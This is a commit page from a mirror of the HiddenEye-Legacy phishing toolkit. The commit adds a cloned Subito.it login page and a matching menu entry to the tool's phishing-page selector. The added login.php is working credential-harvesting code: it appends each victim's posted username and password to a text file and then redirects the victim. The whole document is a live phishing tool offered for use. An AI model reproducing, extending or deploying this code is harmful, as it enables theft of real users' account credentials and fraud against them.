mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Add Subito.it Web Page
This commit is contained in:
parent
17b23dedf1
commit
21744c17e0
|
@ -122,6 +122,8 @@ def runPhishing(page , customOption): #Phishing pages selection menu
|
|||
copy_tree("WebPages/Reddit/", "Server/www/")
|
||||
elif customOption == '2' and page == 'Reddit':
|
||||
copy_tree("WebPages/Reddit-old/", "Server/www/")
|
||||
elif page == 'Subitoit':
|
||||
copy_tree("WebPages/subitoit/", "Server/www/")
|
||||
|
||||
else:
|
||||
endMessage()
|
||||
|
@ -302,9 +304,8 @@ def mainMenu():
|
|||
print (_(" {0}[{1}5{0}]{1} StackOverflow {0}[{1}14{0}]{1} VK {0}[{1}23{0}]{1} PornHub {0}[{1}32{0}]{1} Shopify").format(MAIN0, MAIN2))
|
||||
print (_(" {0}[{1}6{0}]{1} WordPress {0}[{1}15{0}]{1} iCloud {0}[{1}24{0}]{1} Adobe {0}[{1}33{0}]{1} Verizon").format(MAIN0, MAIN2))
|
||||
print (_(" {0}[{1}7{0}]{1} Twitter {0}[{1}16{0}]{1} GitLab {0}[{1}25{0}]{1} Badoo {0}[{1}34{0}]{1} Yandex").format(MAIN0, MAIN2))
|
||||
|
||||
print (_(" {0}[{1}8{0}]{1} Instagram {0}[{1}17{0}]{1} Netflix {0}[{1}26{0}]{1} CryptoCurrency {0}[{1}35{0}]{1} Reddit").format(MAIN0, MAIN2))
|
||||
print (_(" {0}[{1}9{0}]{1} Snapchat {0}[{1}18{0}]{1} Origin {0}[{1}27{0}]{1} DevianArt ").format(MAIN0, MAIN2))
|
||||
print (_(" {0}[{1}9{0}]{1} Snapchat {0}[{1}18{0}]{1} Origin {0}[{1}27{0}]{1} DevianArt {0}[{1}36{0}]{1} SUbito.it").format(MAIN0, MAIN2))
|
||||
option = input(_("{0}HiddenEye >>> {1}").format(MAIN0, MAIN2))
|
||||
if option == '1':
|
||||
loadModule('Facebook')
|
||||
|
@ -446,6 +447,10 @@ def mainMenu():
|
|||
loadModule('Reddit')
|
||||
customOption = input(_("\nOperation mode:\n {0}[{1}1{0}]{1} New reddit page\n {0}[{1}2{0}]{1} Old reddit page\n{0}HiddenEye >>> {2}").format(MAIN0, MAIN2, MAIN2))
|
||||
runPhishing('Reddit', customOption)
|
||||
elif option == '36':
|
||||
loadModule('Subitoit')
|
||||
customOption = ''
|
||||
runPhishing('Subitoit', customOption)
|
||||
|
||||
else:
|
||||
endMessage()
|
||||
|
|
0
HiddenEye.py
Normal file → Executable file
0
HiddenEye.py
Normal file → Executable file
328
WebPages/subitoit/index.html
Normal file
328
WebPages/subitoit/index.html
Normal file
File diff suppressed because one or more lines are too long
6
WebPages/subitoit/login.php
Normal file
6
WebPages/subitoit/login.php
Normal file
|
@ -0,0 +1,6 @@
|
|||
<?php
|
||||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
|
||||
header('Location: <CUSTOM>');
|
||||
exit();
|
Loading…
Reference in New Issue
Block a user